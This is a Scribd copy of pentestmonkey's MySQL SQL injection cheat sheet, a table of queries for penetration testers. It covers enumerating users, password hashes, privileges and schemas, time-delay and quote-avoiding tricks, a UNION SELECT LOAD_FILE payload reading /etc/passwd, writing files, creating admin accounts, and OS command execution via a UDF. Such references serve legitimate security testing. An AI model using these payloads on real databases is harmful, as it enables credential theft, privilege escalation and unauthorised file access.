0% found this document useful (0 votes)
19 views3 pages

MySQL SQL Injection Cheat Sheet

Uploaded by

RI Cardo
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
19 views3 pages

MySQL SQL Injection Cheat Sheet

Uploaded by

RI Cardo
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

4/17/25, 10:00 PM MySQL SQL Injection Cheat Sheet | pentestmonkey

pentestmonkey
Taking the monkey work out of pentesting

Site News
Blog
Tools
Yaptest
Cheat Sheets
Contact

MySQL SQL Injection Cheat Sheet


Some useful syntax reminders for SQL Injection into MySQL databases…

This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data
to make it easier to read and to use the same table for for each database backend. This helps to highlight any
features which are lacking for each database, and enumeration techniques that don’t apply and also areas that
I haven’t got round to researching yet.

The complete list of SQL Injection Cheat Sheets I’m working is:

Oracle
MSSQL
MySQL
PostgreSQL
Ingres
DB2
Informix

I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the
end of the query.

Version SELECT @@version


SELECT 1; #comment
Comments
SELECT /*comment*/1;
SELECT user();
Current User
SELECT system_user();
List Users SELECT user FROM [Link]; — priv
List Password
SELECT host, user, password FROM [Link]; — priv
Hashes
Password
John the Ripper will crack MySQL password hashes.
Cracker
SELECT grantee, privilege_type, is_grantable FROM
information_schema.user_privileges; — list user privsSELECT host, user, Select_priv,
Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv,
Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv,
Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,
List Privileges
Execute_priv, Repl_slave_priv, Repl_client_priv FROM [Link]; — priv, list user
privsSELECT grantee, table_schema, privilege_type FROM
information_schema.schema_privileges; — list privs on databases (schemas)SELECT
table_schema, table_name, column_name, privilege_type FROM
information_schema.column_privileges; — list privs on columns

[Link] 1/3
4/17/25, 10:00 PM MySQL SQL Injection Cheat Sheet | pentestmonkey

SELECT grantee, privilege_type, is_grantable FROM


List DBA
information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host,
Accounts
user FROM [Link] WHERE Super_priv = ‘Y’; # priv
Current
SELECT database()
Database
SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
List Databases
SELECT distinct(db) FROM [Link] — priv
SELECT table_schema, table_name, column_name FROM information_schema.columns
List Columns
WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
SELECT table_schema,table_name FROM information_schema.tables WHERE
List Tables
table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find Tables
SELECT table_schema, table_name FROM information_schema.columns WHERE
From Column
column_name = ‘username’; — find table which have a column called ‘username’
Name
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered
from 0
Select Nth Row
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered
from 0
Select Nth Char SELECT substr(‘abcd’, 3, 1); # returns c
SELECT 6 & 2; # returns 2
Bitwise AND
SELECT 6 & 1; # returns 0
ASCII Value ->
SELECT char(65); # returns A
Char
Char -> ASCII
SELECT ascii(‘A’); # returns 65
Value
SELECT cast(‘1’ AS unsigned integer);
Casting
SELECT cast(‘123’ AS char);
String SELECT CONCAT(‘A’,’B’); #returns AB
Concatenation SELECT CONCAT(‘A’,’B’,’C’); # returns ABC
If Statement SELECT if(1=1,’foo’,’bar’); — returns ‘foo’
Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
Avoiding
SELECT 0x414243; # returns ABC
Quotes
SELECT BENCHMARK(1000000,MD5(‘A’));
Time Delay
SELECT SLEEP(5); # >= 5.0.12
Make DNS
Impossible?
Requests
If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute
OS commands by uploading a shared object file into /usr/lib (or similar). The .so file
Command
should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go
Execution
about this. Remember to compile for the target architecture which may or may not be the
same as your attack platform.
…’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-
Local File
readable files.
Access
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
Hostname, IP
SELECT @@hostname;
Address
Create Users CREATE USER test1 IDENTIFIED BY ‘pass1’; — priv
Delete Users DROP USER test1; — priv

[Link] 2/3
4/17/25, 10:00 PM MySQL SQL Injection Cheat Sheet | pentestmonkey

Make User
GRANT ALL PRIVILEGES ON *.* TO test1@’%’; — priv
DBA
Location of DB
SELECT @@datadir;
files
Default/System information_schema (>= mysql 5.0)
Databases mysql

Thanks
Jonathan Turner for @@hostname tip.

cheatsheet, database, mysql, pentest, sqlinjection

SQL Injection

Postgres SQL Injection Cheat Sheet


Oracle SQL Injection Cheat Sheet

Leave a Reply

You must be logged in to post a comment.

Categories
Blog (78)
Cheat Sheets (10)
Shells (1)
SQL Injection (7)
Contact (2)
Site News (3)
Tools (17)
Audit (3)
Misc (7)
User Enumeration (4)
Web Shells (3)
Uncategorized (3)
Yaptest (15)
Front End (1)
Installing (2)
Overview (2)
Using (8)

Powered by WordPress. Design: Baza Noclegowa.

[Link] 3/3

You might also like